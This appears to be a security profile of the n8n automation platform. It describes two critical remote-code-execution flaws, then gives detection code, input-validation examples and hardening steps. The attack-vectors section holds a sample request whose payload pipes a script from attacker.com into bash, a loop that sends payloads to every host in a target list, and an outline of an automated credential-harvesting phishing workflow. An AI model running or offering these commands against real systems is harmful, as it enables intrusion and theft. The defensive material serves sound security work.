n8n Workflow Automation
Vendor
n8n.io
Category
Autonomous Agent
Privilege Level
User
Version
Latest
Capabilities
- Server-side expression evaluation
- Workflow automation (400+ integrations)
- Terminal command execution
- File system operations
- API integrations (AWS, Google, Slack, etc.)
- Form submissions without authentication
Description
n8n is a popular AI workflow automation platform with over 100 million Docker pulls. It enables building automated workflows through nodes, integrating AI agents with hundreds of services. Two critical RCE vulnerabilities make it one of the most dangerous AI agent platforms currently deployed.
Attack Vectors
1. Ni8mare - Unauthenticated RCE
MITRE ATT&CK: T1190 - Exploit Public-Facing Application
CVE: CVE-2026-21858
CVSS: 10.0 (Critical)
A worst-case vulnerability: an unauthenticated remote attacker can gain full administrative control of the instance.
POST /form/test HTTP/1.1
Host: vulnerable-n8n.com
Content-Type: application/json
{
"data": {
"malicious_payload": "$(curl https://attacker.com/shell.sh | bash)"
}
}
Attack Flow:
- Attacker submits malicious form data
- Content-type confusion bug triggered
- Authentication bypass achieved
- Full admin access obtained
- Database encryption key extracted
- Arbitrary code execution
2. Authenticated Expression Injection
MITRE ATT&CK: T1059
CVE: CVE-2025-68613
CVSS: 9.9 (Critical)
The expression evaluation engine allows an authenticated attacker (any user who can edit a workflow) to achieve RCE on the n8n host.
// Malicious workflow node
{
  "nodes": [{
    "type": "Set",
    "parameters": {
      "values": {
        "string": [
          {
            "name": "result",
            "value": "="
          }
        ]
      }
    }
  }]
}
3. Form-Based RCE
MITRE ATT&CK: T1210
Forms can be submitted without authentication, enabling mass exploitation.
# Automated exploitation
for target in $(cat targets.txt); do
curl -X POST "https://$target/form/test" \
-H "Content-Type: application/json" \
-d '{"data": {"cmd": "$(malicious_payload)"}}'
done
4. AI-Powered Social Engineering
MITRE ATT&CK: T1566
n8n workflows can automate phishing campaigns at scale.
Workflow:
1. AI scrapes target information
2. Generates personalized emails
3. Tracks opens/clicks
4. Harvests credentials via fake forms
5. Exfiltrates to attacker
Detection
Network Monitoring
# Monitor for suspicious form submissions
tcpdump -i any -s 0 -w n8n.pcap 'port 5678'
# Look for command injection patterns
grep -r "execSync\|spawn\|exec" /var/log/n8n/
Application Logs
~/.n8n/logs/
/var/log/n8n/
Docker container logs
Behavioral Indicators
- Unusual form submissions
- Expression evaluation errors
- Unexpected child processes
- Outbound connections to unknown hosts
- Database access anomalies
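One way to turn the behavioural indicators above into a concrete check, as an added example that is not code from n8n or from the original page: a small scanner over reverse-proxy access log lines that flags POSTs to the form endpoint with an unexpected content type (the unauthenticated attack request shown earlier sends application/json), shell-substitution or expression syntax in the submitted values, and bursts of submissions from one source. The log format, the sample lines, the expected form content types and the burst threshold are all assumptions constructed for this example; adapt LINE_RE to the real proxy format in front of n8n.

```javascript
// Added example (not n8n's or the original page's code): scan reverse-proxy access log
// lines in front of n8n for form submissions that match the behavioural indicators above.
// ASSUMPTION: the log format is constructed for this example; adapt LINE_RE to the real
// proxy (nginx, Traefik, ...) format, and EXPECTED_FORM_CTYPES to how your forms are used.

// Constructed sample lines:
//   <ip> [<time>] "<method> <path>" <status> "<content-type>" "<body excerpt>"
const SAMPLE_LOG = [
  '203.0.113.5 [10/Jan/2026:10:00:01 +0000] "POST /form/contact" 200 "multipart/form-data; boundary=abc" "name=alice&message=hello"',
  '198.51.100.7 [10/Jan/2026:10:00:02 +0000] "POST /form/test" 200 "application/json" "{\\"data\\":{\\"x\\":\\"$(id)\\"}}"',
  '198.51.100.7 [10/Jan/2026:10:00:03 +0000] "POST /form/test" 200 "application/json" "{\\"data\\":{\\"x\\":\\"{{ 1+1 }}\\"}}"',
  '203.0.113.9 [10/Jan/2026:10:00:04 +0000] "GET /rest/workflows" 200 "" ""',
  '203.0.113.5 [10/Jan/2026:10:00:05 +0000] "POST /form/contact" 200 "application/x-www-form-urlencoded" "name=bob&message=thanks"',
  '198.51.100.7 [10/Jan/2026:10:00:06 +0000] "POST /form/test" 200 "application/json" "{\\"data\\":{\\"x\\":\\"hello\\"}}"',
  'not a log line at all',
];

const LINE_RE = /^(\S+) \[([^\]]+)\] "(\w+) ([^"]+)" (\d{3}) "([^"]*)" "(.*)"$/;

// Content types a browser-submitted n8n form is assumed to carry; the unauthenticated
// attack request shown on this page uses application/json instead.
const EXPECTED_FORM_CTYPES = ['multipart/form-data', 'application/x-www-form-urlencoded'];

// Shell command substitution, backticks, a pipe into a shell, or the opening "{{" of an
// n8n expression inside submitted field values.
const INJECTION_RE = /\$\(|`|\|\s*(?:ba)?sh\b|\{\{/;

// Parse one access log line into a record, or return null when it does not match.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]), contentType: m[6], body: m[7] };
}

// Returns one alert per suspicious POST to /form/* plus one per source address that
// reaches burstThreshold submissions (mass submission against the form endpoint).
function analyzeFormSubmissions(lines, burstThreshold = 3) {
  const alerts = [];
  const perIp = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec || rec.method !== 'POST' || !rec.path.startsWith('/form/')) continue;
    perIp.set(rec.ip, (perIp.get(rec.ip) || 0) + 1);
    const reasons = [];
    const ctype = rec.contentType.split(';')[0].trim().toLowerCase();
    if (!EXPECTED_FORM_CTYPES.includes(ctype)) reasons.push(`unexpected content-type "${ctype}"`);
    if (INJECTION_RE.test(rec.body)) reasons.push('injection-like pattern in body');
    if (reasons.length) alerts.push({ ip: rec.ip, path: rec.path, time: rec.time, reasons });
  }
  for (const [ip, count] of perIp) {
    if (count >= burstThreshold) {
      alerts.push({ ip, path: '/form/*', time: null, reasons: [`${count} form submissions from one source`] });
    }
  }
  return alerts;
}

for (const a of analyzeFormSubmissions(SAMPLE_LOG)) console.log(a.ip, a.path, a.reasons.join('; '));
```

Run against the constructed lines, only the source sending JSON with substitution or expression syntax to /form/test is reported (three per-request alerts plus one burst alert); the two ordinary browser submissions and the GET are ignored. The content-type check is the most reliable of the three signals for the Ni8mare path, since legitimate browser form posts do not use application/json.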
Prevention
Immediate Actions
1. Update Immediately
# Docker
docker pull n8nio/n8n:1.121.0
# npm
npm update n8n -g
2. Require Authentication for Forms
// n8n settings
{
  "forms": {
    "requireAuth": true,
    "allowPublic": false
  }
}
3. Network Restrictions
# Firewall rules
iptables -A INPUT -p tcp --dport 5678 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 5678 -j DROP
# Don't expose to internet
Long-Term Mitigations
1. Expression Sandboxing
// Restrict dangerous functions
{
  "executions": {
    "maxExpressionDepth": 10,
    "blacklistFunctions": [
      "require",
      "process",
      "child_process",
      "fs"
    ]
  }
}
2. Input Validation
// Validate all form inputs: reject shell/expression metacharacters in every string value.
// Testing JSON.stringify(data) would reject every object, because the serialized form
// itself contains "{" and "}"; so walk the structure and test each string on its own.
function validateInput(data) {
  const dangerous = /[;&|`$(){}[\]<>]/;
  const walk = (value) => {
    if (typeof value === "string") {
      if (dangerous.test(value)) throw new Error("Malicious input detected");
    } else if (value && typeof value === "object") {
      Object.values(value).forEach(walk);
    }
  };
  walk(data);
}
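A blocklist of metacharacters is easy to get wrong and breaks legitimate text (an apostrophe-free name policy is fine, a message field that cannot contain "&" is not). The stricter pattern is an allow-list: declare each field's type, length limit and permitted characters, and reject everything else, including undeclared fields and the "{{" that opens an n8n expression. The following is an added example, not code from n8n or from the original page; the schema, field names and sample submissions are constructed for illustration.

```javascript
// Added example (not n8n's or the original page's code): allow-list validation of form
// fields as a stricter alternative to a metacharacter blocklist. Each field is declared
// with a type, a length limit and a pattern; undeclared fields, wrong types, over-long
// values, non-matching values and n8n expression delimiters are all rejected.
// ASSUMPTION: the schema and field names below are constructed for this example.
const CONTACT_FORM_SCHEMA = {
  name:      { type: 'string', maxLength: 64, pattern: /^[\p{L} .'-]+$/u },
  email:     { type: 'string', maxLength: 254, pattern: /^[^\s@]+@[^\s@]+\.[^\s@]+$/ },
  message:   { type: 'string', maxLength: 2000, pattern: /^[^`$<>]*$/ },
  subscribe: { type: 'boolean', optional: true },
};

const EXPRESSION_RE = /\{\{/; // opening delimiter of an n8n expression

// Returns a list of validation errors; an empty list means the payload is acceptable.
function validateForm(data, schema) {
  if (!data || typeof data !== 'object' || Array.isArray(data)) return ['payload must be a JSON object'];
  const errors = [];
  // Anything not declared in the schema is rejected outright (allow-list, not blocklist).
  for (const key of Object.keys(data)) {
    if (!Object.prototype.hasOwnProperty.call(schema, key)) errors.push(`unexpected field "${key}"`);
  }
  for (const [key, rule] of Object.entries(schema)) {
    const value = data[key];
    if (value === undefined) {
      if (!rule.optional) errors.push(`missing field "${key}"`);
      continue;
    }
    if (typeof value !== rule.type) {
      errors.push(`field "${key}" must be ${rule.type}`);
      continue;
    }
    if (rule.type !== 'string') continue;
    if (value.length > rule.maxLength) errors.push(`field "${key}" exceeds ${rule.maxLength} characters`);
    if (EXPRESSION_RE.test(value)) errors.push(`field "${key}" contains expression syntax`);
    if (!rule.pattern.test(value)) errors.push(`field "${key}" has invalid characters`);
  }
  return errors;
}

// Constructed inputs: one acceptable submission and one that would reach the
// expression engine or a shell if it were passed through unchecked.
const GOOD_SUBMISSION = { name: "Alice O'Neil", email: 'alice@example.com', message: 'Hello there', subscribe: true };
const BAD_SUBMISSION = { name: '$(id)', email: 'x@example.com', message: '{{ 1+1 }}', extra: 1 };

console.log(validateForm(GOOD_SUBMISSION, CONTACT_FORM_SCHEMA)); // []
console.log(validateForm(BAD_SUBMISSION, CONTACT_FORM_SCHEMA));  // three errors
```

Validation of this kind belongs in front of the form handler (a reverse-proxy filter or a first node in the workflow) and is defence in depth only: the authentication bypass in Ni8mare is fixed by updating, not by filtering field contents.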
3. Network Segmentation
- Run n8n in isolated network
- Use VPN for access
- Implement WAF rules
- Monitor all traffic
4. Audit Logging
{
  "logging": {
    "level": "debug",
    "auditLog": true,
    "expressionEvaluation": true,
    "fileAccess": true
  }
}
Artifacts
Configuration Files
~/.n8n/
~/.n8n/config/
/root/.n8n/
Database
~/.n8n/database.sqlite
PostgreSQL: n8n database
Logs
~/.n8n/logs/
/var/log/n8n/
Docker: docker logs n8n
Docker Compose
/docker-compose.yml
/n8n-docker-compose.yml